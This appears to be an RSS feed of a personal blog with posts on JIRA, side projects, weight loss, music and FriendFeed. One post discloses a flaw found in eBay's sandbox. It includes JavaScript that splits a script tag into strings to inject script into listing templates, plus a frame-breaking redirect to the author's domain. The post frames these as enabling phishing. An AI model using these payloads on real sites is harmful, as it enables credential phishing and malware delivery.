&lt;p&gt;JIRA = my new godsend, I love a decent issue tracker and have convinced work to begin using it. I&amp;#8217;ve also moved to using it at home, so hopefully, with a few spare days im going to fill it with tasks and things I want to do for myself; then let the OCD kick in and force myself to do them all as quickly as possible :D&lt;/p&gt;

&lt;p&gt;Oh and PS: life is still crapping rainbows on me :D &lt;/p&gt;</description><link>http://blog.mattrandles.com/post/6352194632</link><guid>http://blog.mattrandles.com/post/6352194632</guid><pubDate>Thu, 09 Jun 2011 14:11:02 +0100</pubDate></item><item><title>Projects</title><description>&lt;p&gt;Things i&amp;#8217;m working on in 2011&lt;/p&gt;
&lt;ul&gt;&lt;li&gt;Bizman - name due to change but put simple: a codeigniter app for managing a small business&lt;/li&gt;
&lt;li&gt;CLH - wont reveal all but it&amp;#8217;s in two parts. The first is a bunch of bash scripts, the other is a server built in node.js&lt;/li&gt;
&lt;li&gt;Myself - the eternal pursuit to better myself and improve everything from linguistic skills and guitar proficiency to learning to enjoy my own company :)&lt;/li&gt;
&lt;/ul&gt;</description><link>http://blog.mattrandles.com/post/2745323264</link><guid>http://blog.mattrandles.com/post/2745323264</guid><pubDate>Fri, 14 Jan 2011 15:51:00 +0000</pubDate></item><item><title>ebay phishing feckery</title><description>&lt;p&gt;Well, I got bored the other night and decided to do a quick little test on the ebay uk sandbox and found some suprising results. By splitting up a script tag into a string you can easily write a script out to the page, to include other javascript files or various other things.&lt;/p&gt;
&lt;p&gt;While this is all good and well for fancifying your ebay templates, it leaves the site vulnerable to phising attacks, I was even more suprised that similar methods could be used to redirect the page. This isn&amp;#8217;t a big deal? Well, the templates are in an iframe, but by redirecting to a suitable link, you can then use futher javascript to break the frame and redirect the entire page. The following code in my test item on the sandbox was able to do the initial frame redirect:&lt;/p&gt;
&lt;pre&gt; script used in ebay template
    var _la = "&amp;lt;scri"; var _mb = "pt&amp;gt;"; var _gp = "&amp;lt;/s"; var _gi = "cript&amp;gt;"
    var _az = "location.href='http://mattrandles.com/ebay-fuckery.html';"
    document.write(_la+_mb+_az+_gp+_gi);
&lt;/pre&gt;

&lt;p&gt;Then, the following simple script on the final page was able to redirect the whole page:&lt;/p&gt;
&lt;pre&gt;    if(top != self) {
        if (window.parent.location.href!="http://mattrandles.com/ebay-fuckery.html") {
            window.parent.location.href='http://mattrandles.com/ebay-fuckery.html';
         }
    } else {
        if (location.href!="http://mattrandles.com/ebay-fuckery.html") {
            location.href='http://mattrandles.com/ebay-fuckery.html';
        }
    }
&lt;/pre&gt;

&lt;p&gt;This, to me, is something that shouldnt be doable on ebay (only tested on sandbox, for all i know the live site blocks this). It opens up the ability to say, host a page that looks like an auction and uses a non-descript ebay like url and dupe the end user into re-logging in on the wrong domain, giving away their username and password &amp;#8230; or launch attempts to install malware.&lt;/p&gt;
&lt;p&gt;Feel free to check out the html page at the link in the above code, but all it does is contain what you&amp;#8217;ve already read here&amp;#8230;. opinions? &lt;a href="http://twitter.com/wehttam"&gt;@wehttam&lt;/a&gt; me on twitter&lt;/p&gt;</description><link>http://blog.mattrandles.com/post/2317660114</link><guid>http://blog.mattrandles.com/post/2317660114</guid><pubDate>Tue, 14 Dec 2010 23:58:19 +0000</pubDate></item><item><title>the shit i do when drunk… thanks to my sis for...</title><description>&lt;iframe width="400" height="300" src="http://www.youtube.com/embed/vY0XTe09D10?wmode=transparent&amp;autohide=1&amp;egm=0&amp;hd=1&amp;iv_load_policy=3&amp;modestbranding=1&amp;rel=0&amp;showinfo=0&amp;showsearch=0" frameborder="0" allowfullscreen&gt;&lt;/iframe&gt;&lt;br/&gt;&lt;br/&gt;&lt;p&gt;the shit i do when drunk… thanks to my sis for uploading…&lt;/p&gt;</description><link>http://blog.mattrandles.com/post/1507247198</link><guid>http://blog.mattrandles.com/post/1507247198</guid><pubDate>Sun, 07 Nov 2010 16:53:58 +0000</pubDate></item><item><title>Weight Loss</title><description>&lt;p&gt;&lt;em&gt;I hesitantly post this here, but I&amp;#8217;ve since removed my 2 weight loss blogs from existence&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Back on 21st March 2009 I decided enough was enough, I had gained a &lt;strong&gt;lot&lt;/strong&gt; of weight and put down a plan to loose it. The loose plan was:&lt;/p&gt;
&lt;ul&gt;&lt;li&gt;2 Mile walk each morning Mon-Sat&lt;/li&gt;
&lt;li&gt;Sensible breakfasts: usually weighed out All Bran and half a grapefruit&lt;/li&gt;
&lt;li&gt;Sensible dinners: tomato&amp;#8217;s on toast, soup and bread etc&lt;/li&gt;
&lt;li&gt;Tea: whatever was going, not too strict&lt;/li&gt;
&lt;li&gt;Snacks: snack-a-jack&amp;#8217;s or yogurts etc&lt;/li&gt;
&lt;/ul&gt;&lt;p&gt;Well, as you can guess I went off the rails, I was too strict then went the opposite with alcohol and eating meals out, even my evening meals I kept overload and lying to myself. Now - enough &lt;strong&gt;is &lt;/strong&gt;enough, weight gain has caused paranoia, loss of self confidence and I&amp;#8217;m potentially looking at new clothes with bigger sizes: so I&amp;#8217;m revising my plan slightly and starting again. My original weight was 142.1kg (huge) and I managed to drop down to 97kg - I won&amp;#8217;t tell my current weight but I will say my goal is 101.6kg (16 stone) and this is my plan, albeit open to change:&lt;/p&gt;
&lt;ul&gt;&lt;li&gt;2 Mile walks and a set wake up time Mon-Thurs&lt;/li&gt;
&lt;li&gt;Day off on Friday = 2 mile walk whenever I need to wake up that day,  but I&amp;#8217;m also planning to work on personal projects on a Friday so no huge sleep-in&amp;#8217;s&lt;/li&gt;
&lt;li&gt;Saturday: whatever comes but hopefully some exercise&lt;/li&gt;
&lt;li&gt;Other exercise: I bought running shoe&amp;#8217;s &lt;strong&gt;and i want to use them&lt;/strong&gt; but exercise sessions should &lt;strong&gt;not&lt;/strong&gt; replace the walk for that day&lt;/li&gt;
&lt;li&gt;Breakfasts / Dinner / Tea: same as before but this time try fruit snack&amp;#8217;s or look at plain snacks - less inviting for abuse, need to reduce both my savory and sweet teeth!&lt;/li&gt;
&lt;li&gt;Drinks: this is a new one but no sugary or fizzy pop before midday, any coke/pepsi should be diet/max/zero - drink my damn tea&amp;#8217;s I originally bought to curb my addictions&lt;/li&gt;
&lt;/ul&gt;&lt;p&gt;Well, that&amp;#8217;s it, it starts today. &lt;/p&gt;</description><link>http://blog.mattrandles.com/post/1451986784</link><guid>http://blog.mattrandles.com/post/1451986784</guid><pubDate>Mon, 01 Nov 2010 08:19:05 +0000</pubDate><category>weightloss</category><category>weight</category></item><item><title>The Damned Things - We’ve Got A Situation Here (via...</title><description>&lt;iframe width="400" height="245" src="http://www.youtube.com/embed/dWJ-Oluf3Ww?wmode=transparent&amp;autohide=1&amp;egm=0&amp;hd=1&amp;iv_load_policy=3&amp;modestbranding=1&amp;rel=0&amp;showinfo=0&amp;showsearch=0" frameborder="0" allowfullscreen&gt;&lt;/iframe&gt;&lt;br/&gt;&lt;br/&gt;&lt;p&gt;&lt;a href="http://www.youtube.com/watch?v=dWJ-Oluf3Ww"&gt;The Damned Things - We’ve Got A Situation Here&lt;/a&gt; (via &lt;a href="http://youtube.com/user/TheDamnedThings"&gt;TheDamnedThings&lt;/a&gt;) easily my new favorite song&lt;/p&gt;</description><link>http://blog.mattrandles.com/post/1384786675</link><guid>http://blog.mattrandles.com/post/1384786675</guid><pubDate>Sun, 24 Oct 2010 00:49:13 +0100</pubDate></item><item><title>Finally getting to it</title><description>&lt;p&gt;I&amp;#8217;ve just finished clearing off a lot of items on the web I didn&amp;#8217;t want there anymore. But I can give a list of new year hopes&amp;#8230;.&lt;/p&gt;
&lt;ul&gt;&lt;li&gt;Make time to read more blog and technology news&lt;/li&gt;
&lt;li&gt;Make time to learn new languages, both computer and linguistically speaking&lt;/li&gt;
&lt;li&gt;Train myself to jog a 5k&lt;/li&gt;
&lt;li&gt;Weight training to get rid of some skin&lt;/li&gt;
&lt;li&gt;Loose another 2 stone&lt;/li&gt;
&lt;li&gt;Work on Friday&amp;#8217;s and save money like a mad man&lt;/li&gt;
&lt;li&gt;&lt;b&gt;Learn to be confident and random on a night out without alcohol&lt;/b&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;p&gt;As you may have guessed, the last is quite important in helping with the rest in some way or other.&lt;/p&gt;</description><link>http://blog.mattrandles.com/post/316059189</link><guid>http://blog.mattrandles.com/post/316059189</guid><pubDate>Mon, 04 Jan 2010 08:54:42 +0000</pubDate></item><item><title>its been a loooong time</title><description>&lt;p&gt;Wow, i&amp;#8217;ve spent the past few months hiding from my pc and tumblr and etc etc etc&lt;/p&gt;

&lt;p&gt;Let me begin by saying I&amp;#8217;ve gone through a few different services and had my ups and downs with all of them. At its most basic I used to be hooked on IRC channels then forums and msn etc, but thats not the type of service I&amp;#8217;m on about.&lt;/p&gt;
&lt;p&gt;I never did myspace, I just disliked it from the start for some reason. I did join facebook, and loved it but I prefer flickr etc for photos and dislike the integration possibilities. Then of course there&amp;#8217;s twitter, which I still use, its great to see links flying past and I have my second account which has helped me keep track of my food and loose weight. After that, there was pownce, which I loved untill it shut down, even tho it seemed innevitable as messages slowed.&lt;/p&gt;
&lt;p&gt;I used strands for a while when Drew O was championing their cause - but as the focus of the site changed it didnt suit what I was after (my focus may have changed now, but thats for another blog). I also joined FriendFeed - which I&amp;#8217;m still on and finally i&amp;#8217;m getting to the point of this post&amp;#8230;.&lt;/p&gt;

&lt;p&gt;I must admit, i&amp;#8217;m slightly worried over any merger / takeover / selling of Friendfeed, its not a problem with Facebook. I personally feel, friendfeed has grown greatly, improved loads and has a good feature set - but I was excited to see where they would head with the service and what unique offerings they could bring to the table!&lt;/p&gt;
&lt;p&gt;My worry is that the merger will end up with Facebook eating up Friendfeed, some features going into Facebook, some being left and that Friendfeed will either chug along for a long time or eventually disolve.&lt;/p&gt;
&lt;p&gt;But, on the flipside I&amp;#8217;m also eager to hear / read / watch all the interviews and news bits over this next week to see what others have to say and see if i&amp;#8217;ve miss-judged the situation completely&lt;/p&gt;</description><link>http://blog.mattrandles.com/post/160047955</link><guid>http://blog.mattrandles.com/post/160047955</guid><pubDate>Mon, 10 Aug 2009 22:33:01 +0100</pubDate><category>rant</category><category>facebook</category><category>friendfeed</category></item></channel></rss>
